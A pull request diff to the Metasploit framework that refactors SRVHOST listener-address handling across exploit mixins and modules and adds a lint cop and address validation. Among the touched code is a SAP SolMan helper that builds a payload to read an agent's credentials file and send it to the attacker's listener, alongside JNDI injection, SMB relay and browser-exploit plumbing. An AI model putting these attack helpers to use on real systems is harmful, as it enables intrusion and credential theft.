### PR TITLE
This adjusts module options that need a routable address

### DIFF
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -25,6 +25,7 @@ require:
   - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
   - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
   - ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb
+  - ./lib/rubocop/cop/lint/datastore_srvhost_usage.rb
 
 Layout/SpaceBeforeBrackets:
   Enabled: true

--- a/lib/msf/core/exploit/cmd_stager.rb
+++ b/lib/msf/core/exploit/cmd_stager.rb
@@ -59,14 +59,13 @@ module Exploit::CmdStager
     server_conditions = ['CMDSTAGER::FLAVOR', 'in', %w{auto tftp wget curl fetch lwprequest psh_invokewebrequest ftp_http}]
     register_options(
       [
-        OptAddressLocal.new('SRVHOST', [true, 'The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.', '0.0.0.0' ], conditions: server_conditions),
-        OptPort.new('SRVPORT', [true, "The local port to listen on.", 8080], conditions: server_conditions)
+        OptPort.new('SRVPORT', [true, 'The local port to listen on', 8080], conditions: server_conditions)
       ])
 
     register_advanced_options(
       [
-        OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
-        OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.']),
+        OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use', 'auto', flavors]),
+        OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use']),
         OptString.new('CMDSTAGER::TEMP', [false, 'Writable directory for staged files']),
         OptString.new('CMDSTAGER::URIPATH', [false, 'Payload URI path for supported stagers']),
         OptBool.new('CMDSTAGER::SSL', [false, 'Use SSL/TLS for supported stagers', false])

--- a/lib/msf/core/exploit/cmd_stager/http.rb
+++ b/lib/msf/core/exploit/cmd_stager/http.rb
@@ -9,6 +9,12 @@ module HTTP
     super(update_info(info,
       'Stance' => Msf::Exploit::Stance::Aggressive
     ))
+
+    register_options(
+      [
+        ::Msf::OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
+      ]
+    )
   end
 
   def cmdstager_start_service(opts = {})

--- a/lib/msf/core/exploit/format/webarchive.rb
+++ b/lib/msf/core/exploit/format/webarchive.rb
@@ -329,7 +329,7 @@ function reportStolenCookies() {
   # @return [String] formatted http/https URL of the listener
   def backend_url
     proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['HTTPPORT'].to_i == 80) ? '' : ":#{datastore['HTTPPORT']}"
     "#{proto}://#{myhost}#{port_str}"
   end

--- a/lib/msf/core/exploit/format/webarchive.rb
+++ b/lib/msf/core/exploit/format/webarchive.rb
@@ -328,10 +328,8 @@ function reportStolenCookies() {
 
   # @return [String] formatted http/https URL of the listener
   def backend_url
-    proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    port_str = (datastore['HTTPPORT'].to_i == 80) ? '' : ":#{datastore['HTTPPORT']}"
-    "#{proto}://#{myhost}#{port_str}"
+    resource = get_resource.end_with?('/') ? get_resource[0, get_resource.length - 1] : get_resource
+    get_uri("#{resource}/catch")
   end
 
   # @return [String] URL that serves the malicious webarchive

--- a/lib/msf/core/exploit/remote/browser_autopwn2.rb
+++ b/lib/msf/core/exploit/remote/browser_autopwn2.rb
@@ -128,7 +128,7 @@ module Msf
       p = select_payload(xploit)
       xploit.datastore['PAYLOAD']     = p.first[:payload_name]
       xploit.datastore['LPORT']       = p.first[:payload_lport]
-      xploit.datastore['SRVHOST']     = datastore['SRVHOST']
+      xploit.datastore['SRVHOST']     = srvhost
       xploit.datastore['SRVPORT']     = datastore['SRVPORT']
       xploit.datastore['LHOST']       = get_payload_lhost
 
@@ -553,12 +553,13 @@ module Msf
       show_ready_exploits
       proto = (datastore['SSL'] ? "https" : "http")
 
+      service_srvhost = nil
       if datastore['URIHOST'] && datastore['URIHOST'] != '0.0.0.0'
-        srvhost = datastore['URIHOST']
-      elsif datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
-        srvhost = datastore['SRVHOST']
+        service_srvhost = datastore['URIHOST']
+      elsif srvhost && srvhost != '0.0.0.0'
+        service_srvhost = srvhost
       else
-        srvhost = Rex::Socket.source_address
+        service_srvhost = Rex::Socket.source_address
       end
 
       if datastore['URIPORT'] && datastore['URIPORT'] != 0
@@ -567,7 +568,7 @@ module Msf
         srvport = datastore['SRVPORT']
       end
 
-      service_uri = "#{proto}://#{srvhost}:#{srvport}#{get_resource}"
+      service_uri = "#{proto}://#{service_srvhost}:#{srvport}#{get_resource}"
       print_good("Please use the following URL for the browser attack:")
       print_good("BrowserAutoPwn URL: #{service_uri}")
     end
@@ -663,8 +664,8 @@ module Msf
         host = ''
         if datastore['URIHOST'] && datastore['URIHOST'] != '0.0.0.0'
           host = datastore['URIHOST']
-        elsif datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
-          host = datastore['SRVHOST']
+        elsif srvhost && srvhost != '0.0.0.0'
+          host = srvhost
         else
           host = Rex::Socket.source_address
         end

--- a/lib/msf/core/exploit/remote/browser_autopwn2.rb
+++ b/lib/msf/core/exploit/remote/browser_autopwn2.rb
@@ -556,10 +556,8 @@ module Msf
       service_srvhost = nil
       if datastore['URIHOST'] && datastore['URIHOST'] != '0.0.0.0'
         service_srvhost = datastore['URIHOST']
-      elsif srvhost && srvhost != '0.0.0.0'
-        service_srvhost = srvhost
       else
-        service_srvhost = Rex::Socket.source_address
+        service_srvhost = srvhost_addr
       end
 
       if datastore['URIPORT'] && datastore['URIPORT'] != 0
@@ -568,7 +566,7 @@ module Msf
         srvport = datastore['SRVPORT']
       end
 
-      service_uri = "#{proto}://#{service_srvhost}:#{srvport}#{get_resource}"
+      service_uri = "#{proto}://#{Rex::Socket.to_authority(service_srvhost, srvport)}#{get_resource}"
       print_good("Please use the following URL for the browser attack:")
       print_good("BrowserAutoPwn URL: #{service_uri}")
     end
@@ -664,10 +662,8 @@ module Msf
         host = ''
         if datastore['URIHOST'] && datastore['URIHOST'] != '0.0.0.0'
           host = datastore['URIHOST']
-        elsif srvhost && srvhost != '0.0.0.0'
-          host = srvhost
         else
-          host = Rex::Socket.source_address
+          host = srvhost
         end
         if datastore['URIPORT'] && datastore['URIPORT'] != 0
           port = datastore['URIPORT']
@@ -676,7 +672,7 @@ module Msf
         end
 
         resource = mod.datastore['URIPATH']
-        url = "#{proto}://#{host}:#{port}#{resource}"
+        url = "#{proto}://#{Rex::Socket.to_authority(host, port)}#{resource}"
         urls << url
       end
 

--- a/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
+++ b/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
@@ -49,8 +49,8 @@ module Msf
     end
 
     # Make payload for steal credentials for SolMan server from agent
-    def make_steal_credentials_payload(instance, host, port, url)
-      command = "var u = new Packages.java.net.URL(\"http://#{host}:#{port}#{url}\");"
+    def make_steal_credentials_payload(instance, url)
+      command = "var u = new Packages.java.net.URL(\"#{url}\");"
       command << 'var o = Packages.java.lang.System.getProperty("os.name").toLowerCase();'
       command << 'if (o.indexOf("win") >= 0) '
       command << "{var p = Packages.java.nio.file.Paths.get(\"C:\\\\usr\\\\sap\\\\DAA\\\\#{instance}\\\\SMDAgent\\\\configuration\\\\secstore.properties\");} "

--- a/lib/msf/core/exploit/remote/http_server.rb
+++ b/lib/msf/core/exploit/remote/http_server.rb
@@ -490,7 +490,7 @@ module Exploit::Remote::HttpServer
     elsif (datastore['LHOST'] and (!datastore['LHOST'].strip.empty?))
       host = datastore["LHOST"]
     else
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      if (srvhost == "0.0.0.0" or srvhost == "::")
         if (respond_to?(:sock) and sock and sock.peerhost)
           # Then this is a Passive-Aggressive module. It has a socket
           # connected to the remote server from which we can deduce the
@@ -505,7 +505,7 @@ module Exploit::Remote::HttpServer
           host = Rex::Socket.source_address
         end
       else
-        host = datastore['SRVHOST']
+        host = srvhost
       end
     end
 

--- a/lib/msf/core/exploit/remote/http_server.rb
+++ b/lib/msf/core/exploit/remote/http_server.rb
@@ -485,31 +485,9 @@ module Exploit::Remote::HttpServer
   #
   # @return [String]
   def srvhost_addr
-    if datastore['URIHOST']
-      host = datastore['URIHOST']
-    elsif (datastore['LHOST'] and (!datastore['LHOST'].strip.empty?))
-      host = datastore["LHOST"]
-    else
-      if (srvhost == "0.0.0.0" or srvhost == "::")
-        if (respond_to?(:sock) and sock and sock.peerhost)
-          # Then this is a Passive-Aggressive module. It has a socket
-          # connected to the remote server from which we can deduce the
-          # appropriate source address.
-          host = Rex::Socket.source_address(sock.peerhost)
-        else
-          # Otherwise, this module is only a server, not a client, *and*
-          # the payload does not have an LHOST option. This can happen,
-          # for example, with a browser exploit using a download-exec
-          # payload. In that case, just use the address of the interface
-          # with the default gateway and hope for the best.
-          host = Rex::Socket.source_address
-        end
-      else
-        host = srvhost
-      end
-    end
+    return datastore['URIHOST'] if datastore['URIHOST'].present?
 
-    host
+    super
   end
 
   #

--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@@ -35,7 +35,7 @@ module Exploit::Remote::JndiInjection
   # @return [String] the JNDI string
   def jndi_string(resource = nil)
     resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
-    "ldap://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{resource}"
+    "ldap://#{Rex::Socket.to_authority(srvhost, datastore['SRVPORT'])}/#{resource}"
   end
 
   ## LDAP service callbacks

--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@@ -22,7 +22,7 @@ module Exploit::Remote::JndiInjection
     register_options(
       [
         OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
-      ], Exploit::Remote::JndiInjection
+      ]
     )
 
     register_advanced_options([

--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@@ -21,7 +21,7 @@ module Exploit::Remote::JndiInjection
 
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
       ]
     )
 
@@ -35,7 +35,7 @@ module Exploit::Remote::JndiInjection
   # @return [String] the JNDI string
   def jndi_string(resource = nil)
     resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
-    "ldap://#{Rex::Socket.to_authority(srvhost, datastore['SRVPORT'])}/#{resource}"
+    "ldap://#{Rex::Socket.to_authority(srvhost_addr, datastore['SRVPORT'])}/#{resource}"
   end
 
   ## LDAP service callbacks

--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@@ -19,6 +19,12 @@ module Exploit::Remote::JndiInjection
     super(update_info(info,
       'Stance' => Msf::Exploit::Stance::Aggressive))
 
+    register_options(
+      [
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+      ], Exploit::Remote::JndiInjection
+    )
+
     register_advanced_options([
       OptBool.new('LDAP_AUTH_BYPASS', [true, 'Ignore LDAP client authentication', true])
     ])
@@ -134,9 +140,6 @@ module Exploit::Remote::JndiInjection
   end
 
   def validate_configuration!
-    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
-      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
-    end
   end
 end
 end

--- a/lib/msf/core/exploit/remote/smb/relay_server.rb
+++ b/lib/msf/core/exploit/remote/smb/relay_server.rb
@@ -117,14 +117,14 @@ module Msf
 
         validate_smb_hash_capture_datastore(datastore, ntlm_provider)
 
-        comm = _determine_server_comm(datastore['SRVHOST'])
-        print_status("SMB Server is running. Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+        comm = _determine_server_comm(srvhost)
+        print_status("SMB Server is running. Listening on #{srvhost}:#{datastore['SRVPORT']}")
         @service = Rex::ServiceManager.start(
           self.class::SMBRelayServer,
           {
             socket: {
               'Comm' => comm,
-              'LocalHost' => datastore['SRVHOST'],
+              'LocalHost' => srvhost,
               'LocalPort' => datastore['SRVPORT'],
               'Server' => true,
               'Timeout' => datastore['SRV_TIMEOUT'],

--- a/lib/msf/core/exploit/remote/smb/relay_server.rb
+++ b/lib/msf/core/exploit/remote/smb/relay_server.rb
@@ -117,14 +117,13 @@ module Msf
 
         validate_smb_hash_capture_datastore(datastore, ntlm_provider)
 
-        comm = _determine_server_comm(srvhost)
-        print_status("SMB Server is running. Listening on #{srvhost}:#{datastore['SRVPORT']}")
+        comm = _determine_server_comm(bindhost)
         @service = Rex::ServiceManager.start(
           self.class::SMBRelayServer,
           {
             socket: {
               'Comm' => comm,
-              'LocalHost' => srvhost,
+              'LocalHost' => bindhost,
               'LocalPort' => datastore['SRVPORT'],
               'Server' => true,
               'Timeout' => datastore['SRV_TIMEOUT'],
@@ -143,6 +142,8 @@ module Msf
             }
           }
         )
+        print_status("SMB Server is running. Listening on #{Rex::Socket.to_authority(bindhost, datastore['SRVPORT'])}")
+        @service
       rescue Errno::EACCES => e
         fail_with(Msf::Module::Failure::BadConfig, "Failed to create the relay server: #{e.to_s}")
       end

--- a/lib/msf/core/exploit/remote/smb/server/share.rb
+++ b/lib/msf/core/exploit/remote/smb/server/share.rb
@@ -27,7 +27,7 @@ module Msf
 
         register_options(
           [
-            OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+            OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections.']),
             OptString.new('SHARE', [ false, 'Share (Default: random); cannot contain spaces or slashes'], regex: /^[^\s\/\\]*$/),
             OptString.new('FILE_NAME', [ false, 'File name to share (Default: random)']),
             OptString.new('FOLDER_NAME', [ false, 'Folder name to share (Default: none)'])

--- a/lib/msf/core/exploit/remote/smb/server/share.rb
+++ b/lib/msf/core/exploit/remote/smb/server/share.rb
@@ -27,6 +27,7 @@ module Msf
 
         register_options(
           [
+            OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
             OptString.new('SHARE', [ false, 'Share (Default: random); cannot contain spaces or slashes'], regex: /^[^\s\/\\]*$/),
             OptString.new('FILE_NAME', [ false, 'File name to share (Default: random)']),
             OptString.new('FOLDER_NAME', [ false, 'Folder name to share (Default: none)'])

--- a/lib/msf/core/exploit/remote/socket_server.rb
+++ b/lib/msf/core/exploit/remote/socket_server.rb
@@ -121,6 +121,34 @@ module Exploit::Remote::SocketServer
     datastore['SRVPORT']
   end
 
+  def srvhost_addr
+    if datastore['LHOST'].present?
+      host = datastore["LHOST"]
+    else
+      if Rex::Socket.is_ip_addr?(srvhost) && Rex::Socket.addr_atoi(srvhost) == 0
+        if (respond_to?(:sock) and sock and sock.peerhost)
+          # Then this is a Passive-Aggressive module. It has a socket
+          # connected to the remote server from which we can deduce the
+          # appropriate source address.
+          host = Rex::Socket.source_address(sock.peerhost)
+        elsif datastore['RHOST'].present?
+          host = Rex::Socket.source_address(datastore['RHOST'])
+        else
+          # Otherwise, this module is only a server, not a client, *and*
+          # the payload does not have an LHOST option. This can happen,
+          # for example, with a browser exploit using a download-exec
+          # payload. In that case, just use the address of the interface
+          # with the default gateway and hope for the best.
+          host = Rex::Socket.source_address
+        end
+      else
+        host = srvhost
+      end
+    end
+
+    host
+  end
+
   #
   # Returns the address that the service is bound to. Can be different from SRVHOST when the ListenerBindAddress is
   # specified and can be used for binding to a specific address when NATing is in place.

--- a/lib/msf/core/exploit/remote/socket_server.rb
+++ b/lib/msf/core/exploit/remote/socket_server.rb
@@ -111,7 +111,7 @@ module Exploit::Remote::SocketServer
   # Returns the local host that is being listened on.
   #
   def srvhost
-    datastore['SRVHOST']
+    datastore['SRVHOST'] # rubocop:disable Lint/DatastoreSrvhostUsage
   end
 
   #
@@ -126,7 +126,7 @@ module Exploit::Remote::SocketServer
   # specified and can be used for binding to a specific address when NATing is in place.
   #
   def bindhost
-    datastore['ListenerBindAddress'].blank? ? datastore['SRVHOST'] : datastore['ListenerBindAddress']
+    datastore['ListenerBindAddress'].blank? ? srvhost : datastore['ListenerBindAddress']
   end
 
   def bindport

--- a/lib/msf/core/opt_address_local.rb
+++ b/lib/msf/core/opt_address_local.rb
@@ -5,7 +5,7 @@ module Msf
 
 ###
 #
-# Local network address option.
+# Network address option that allows referencing an address based on the name of the interface it's associated with.
 #
 ###
 class OptAddressLocal < OptAddress

--- a/lib/msf/core/opt_address_local.rb
+++ b/lib/msf/core/opt_address_local.rb
@@ -8,42 +8,17 @@ module Msf
 # Network address option that allows referencing an address based on the name of the interface it's associated with.
 #
 ###
-class OptAddressLocal < OptAddress
-  def interfaces
-    begin
-      NetworkInterface.interfaces || []
-    rescue NetworkInterface::Error => e
-      elog(e)
-      []
-    end
-  end
-
-  def normalize(value)
-    return unless value.kind_of?(String)
-    return value unless interfaces.include?(value)
-
-    addrs = NetworkInterface.addresses(value).values.flatten
-
-    # Strip interface name from address (see getifaddrs(3))
-    addrs = addrs.map { |x| x['addr'].split('%').first }.select do |addr|
-      begin
-        IPAddr.new(addr)
-      rescue IPAddr::Error
-        false
-      end
-    end
-
-    # Sort for deterministic normalization; preference ipv4 addresses followed by their value
-    sorted_addrs = addrs.sort_by { |addr| ip_addr = IPAddr.new(addr); [ip_addr.ipv4? ? 0 : 1, ip_addr.to_i] }
-
-    sorted_addrs.any? ? sorted_addrs.first : ''
-  end
+class OptAddressLocal < OptAddressRoutable
 
   def valid?(value, check_empty: true, datastore: nil)
     return false if check_empty && empty_required_value?(value)
     return false unless value.kind_of?(String) || value.kind_of?(NilClass)
 
     return true if interfaces.include?(value)
+
+    # todo: this should probably have additional validation to ensure that the address is able to be bound to, this
+    # would mean that the address is either locally available, or available via a Rex::Socket channel, e.g. a Meterpreter
+    # session
 
     super
   end

--- a/lib/msf/core/opt_address_routable.rb
+++ b/lib/msf/core/opt_address_routable.rb
@@ -8,13 +8,47 @@ module Msf
   #
   ###
   class OptAddressRoutable < OptAddress
+    def interfaces
+      begin
+        NetworkInterface.interfaces || []
+      rescue NetworkInterface::Error => e
+        elog(e)
+        []
+      end
+    end
+
+    def normalize(value)
+      return unless value.kind_of?(String)
+      return value unless interfaces.include?(value)
+
+      addrs = NetworkInterface.addresses(value).values.flatten
+
+      # Strip interface name from address (see getifaddrs(3))
+      addrs = addrs.map { |x| x['addr'].split('%').first }.select do |addr|
+        begin
+          IPAddr.new(addr)
+        rescue IPAddr::Error
+          false
+        end
+      end
+
+      # Sort for deterministic normalization; preference ipv4 addresses followed by their value
+      sorted_addrs = addrs.sort_by { |addr| ip_addr = IPAddr.new(addr); [ip_addr.ipv4? ? 0 : 1, ip_addr.to_i] }
+
+      sorted_addrs.any? ? sorted_addrs.first : ''
+    end
 
     def valid?(value, check_empty: true, datastore: nil)
+      return false if check_empty && empty_required_value?(value)
+      return false unless value.kind_of?(String) || value.kind_of?(NilClass)
+
+      return true if interfaces.include?(value)
+
       return false if Rex::Socket.is_ip_addr?(value) && Rex::Socket.addr_atoi(value) == 0
 
       if Rex::Socket.is_ipv4?(value)
         ip_addr = IPAddr.new(value)
-        return false if IPAddr.new('0.0.0.0/0').include? ip_addr   # this network
+        return false if IPAddr.new('0.0.0.0/8').include? ip_addr   # this network
         return false if IPAddr.new('224.0.0.0/4').include? ip_addr # multicast
         return false if IPAddr.new('240.0.0.0/4').include? ip_addr # reserved
         return false if IPAddr.new('255.255.255.255') == ip_addr   # broadcast

--- a/lib/msf/core/opt_address_routable.rb
+++ b/lib/msf/core/opt_address_routable.rb
@@ -11,6 +11,15 @@ module Msf
 
     def valid?(value, check_empty: true, datastore: nil)
       return false if Rex::Socket.is_ip_addr?(value) && Rex::Socket.addr_atoi(value) == 0
+
+      if Rex::Socket.is_ipv4?(value)
+        ip_addr = IPAddr.new(value)
+        return false if IPAddr.new('0.0.0.0/0').include? ip_addr   # this network
+        return false if IPAddr.new('224.0.0.0/4').include? ip_addr # multicast
+        return false if IPAddr.new('240.0.0.0/4').include? ip_addr # reserved
+        return false if IPAddr.new('255.255.255.255') == ip_addr   # broadcast
+      end
+
       super
     end
   end

--- a/lib/msf/util/payload_cached_size.rb
+++ b/lib/msf/util/payload_cached_size.rb
@@ -45,13 +45,13 @@ class PayloadCachedSize
   }.freeze
 
   OPTS_IPV4 = {
-    'LHOST' => '255.255.255.255',
+    'LHOST' => '223.255.255.255',
     'KHOST' => '255.255.255.255',
     'AHOST' => '255.255.255.255'
   }.freeze
 
   OPTS_IPV6 = {
-    'LHOST' => 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff',
+    'LHOST' => 'fdff:ffff:ffff:ffff:ffff:ffff:ffff:ffff',
     'KHOST' => 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff',
     'AHOST' => 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff'
   }.freeze
@@ -60,7 +60,7 @@ class PayloadCachedSize
   #
   # @param data [String] The source code of a payload module
   # @param cached_size [String] The new value for cached_size, which
-  #   which should be either numeric or the string :dynamic
+  #   should be either numeric or the string :dynamic
   # @return [String]
   def self.update_cache_constant(data, cached_size)
     data.

--- a/lib/rubocop/cop/lint/datastore_srvhost_usage.rb
+++ b/lib/rubocop/cop/lint/datastore_srvhost_usage.rb
@@ -1,0 +1,42 @@
+# frozen_string_literal: true
+
+module RuboCop
+  module Cop
+    module Lint
+      # Detects direct access to datastore['SRVHOST'] and recommends using the srvhost method instead.
+      #
+      # The srvhost method provides a cleaner API for accessing the SRVHOST value from the datastore.
+      #
+      # @example
+      #   # bad
+      #   datastore['SRVHOST']
+      #   datastore["SRVHOST"]
+      #
+      #   # good
+      #   srvhost
+      class DatastoreSrvhostUsage < Base
+        extend AutoCorrector
+
+        MSG = 'Use the `srvhost` method instead of directly accessing `datastore[\'SRVHOST\']`.'
+
+        # @!method datastore_srvhost_access?(node)
+        def_node_matcher :datastore_srvhost_access?, <<~PATTERN
+          (send
+            (send nil? :datastore) :[]
+            (str {"SRVHOST"}))
+        PATTERN
+
+        # Called for every method call in the code
+        # Checks if it's a datastore['SRVHOST'] access and registers an offense if so
+        # @param node [RuboCop::AST::SendNode] The method call node being checked
+        def on_send(node)
+          return unless datastore_srvhost_access?(node)
+
+          add_offense(node, message: MSG) do |corrector|
+            corrector.replace(node, 'srvhost')
+          end
+        end
+      end
+    end
+  end
+end

--- a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
+++ b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def backend_url
     proto = (datastore['SSL'] ? 'https' : 'http')
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
   end

--- a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
+++ b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
@@ -176,10 +176,8 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def backend_url
-    proto = (datastore['SSL'] ? 'https' : 'http')
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
-    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
+    resource = get_resource.end_with?('/') ? get_resource[0, get_resource.length - 1] : get_resource
+    get_uri("#{resource}/catch")
   end
 
   def run

--- a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
+++ b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
@@ -176,8 +176,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def backend_url
-    resource = get_resource.end_with?('/') ? get_resource[0, get_resource.length - 1] : get_resource
-    get_uri("#{resource}/catch")
+    "#{get_uri}/catch"
   end
 
   def run

--- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
@@ -253,7 +253,7 @@ class MetasploitModule < Msf::Auxiliary
         }
       }
     )
-    @creds_payload = make_steal_credentials_payload(agent[:instanceName], get_uri("/#{@script_name}")
+    @creds_payload = make_steal_credentials_payload(agent[:instanceName], "#{get_uri(cli)}/#{@script_name}")
     print_status("Start script: #{@script_name} with payload for retrieving SolMan credentials file from agent: #{@agent_name}")
     send_soap_request(make_soap_body(@agent_name, @script_name, @creds_payload))
 

--- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('SSRF_METHOD', [true, 'HTTP method for SSRF', 'GET'], conditions: %w[ACTION == SSRF]),
         OptString.new('SSRF_URI', [true, 'URI for SSRF', 'http://127.0.0.1:80/'], conditions: %w[ACTION == SSRF]),
         OptString.new('COMMAND', [true, 'Command for execute in agent', 'id'], conditions: %w[ACTION == EXEC]),
-        OptAddress.new('SRVHOST', [ true, 'The local IP address to listen HTTP requests from agents', '192.168.1.1' ], conditions: %w[ACTION == SECSTORE]),
+        OptAddressRoutable.new('SRVHOST', [ false, 'The local IP address to listen HTTP requests from agents' ], conditions: %w[ACTION == SECSTORE]),
         OptPort.new('SRVPORT', [ true, 'The local port to listen HTTP requests from agents', 8000 ], conditions: %w[ACTION == SECSTORE]),
         OptString.new('AGENT', [true, 'Agent server name for exec command or SSRF', 'agent_server_name'], conditions: ['ACTION', 'in', %w[SSRF EXEC SECSTORE]]),
       ]
@@ -68,8 +68,6 @@ class MetasploitModule < Msf::Auxiliary
   def setup_xml_and_variables
     @host = datastore['RHOSTS']
     @port = datastore['RPORT']
-    @srv_host = srvhost
-    @srv_port = datastore['SRVPORT']
     @path = datastore['TARGETURI']
 
     @agent_name = datastore['AGENT']
@@ -255,7 +253,7 @@ class MetasploitModule < Msf::Auxiliary
         }
       }
     )
-    @creds_payload = make_steal_credentials_payload(agent[:instanceName], @srv_host, @srv_port, "/#{@script_name}")
+    @creds_payload = make_steal_credentials_payload(agent[:instanceName], get_uri("/#{@script_name}")
     print_status("Start script: #{@script_name} with payload for retrieving SolMan credentials file from agent: #{@agent_name}")
     send_soap_request(make_soap_body(@agent_name, @script_name, @creds_payload))
 

--- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
   def setup_xml_and_variables
     @host = datastore['RHOSTS']
     @port = datastore['RPORT']
-    @srv_host = datastore['SRVHOST']
+    @srv_host = srvhost
     @srv_port = datastore['SRVPORT']
     @path = datastore['TARGETURI']
 

--- a/modules/auxiliary/fileformat/specialfolder_leak.rb
+++ b/modules/auxiliary/fileformat/specialfolder_leak.rb
@@ -161,7 +161,7 @@ class MetasploitModule < Msf::Auxiliary
     lnk_data = ms_shllink(unc_path, app_name)
     file_create(lnk_data)
     print_good("LNK file created: #{datastore['FILENAME']}")
-    print_status("Listening for hashes on #{srvhost}:#{datastore['SRVPORT']}")
+    print_status("Listening for hashes on #{Rex::Socket.to_authority(bindhost, bindport)}")
     stime = Time.now.to_f
     timeout = datastore['ListenerTimeout'].to_i
     loop do

--- a/modules/auxiliary/fileformat/specialfolder_leak.rb
+++ b/modules/auxiliary/fileformat/specialfolder_leak.rb
@@ -156,12 +156,12 @@ class MetasploitModule < Msf::Auxiliary
     start_service
     unc_share = datastore['SHARE']
     unc_share = Rex::Text.rand_text_alphanumeric(6) if unc_share.blank?
-    unc_path = "\\\\#{datastore['SRVHOST']}\\#{unc_share}"
+    unc_path = "\\\\#{srvhost}\\#{unc_share}"
 
     lnk_data = ms_shllink(unc_path, app_name)
     file_create(lnk_data)
     print_good("LNK file created: #{datastore['FILENAME']}")
-    print_status("Listening for hashes on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    print_status("Listening for hashes on #{srvhost}:#{datastore['SRVPORT']}")
     stime = Time.now.to_f
     timeout = datastore['ListenerTimeout'].to_i
     loop do

--- a/modules/auxiliary/gather/android_stock_browser_uxss.rb
+++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb
@@ -218,13 +218,6 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
-  def backend_url
-    proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
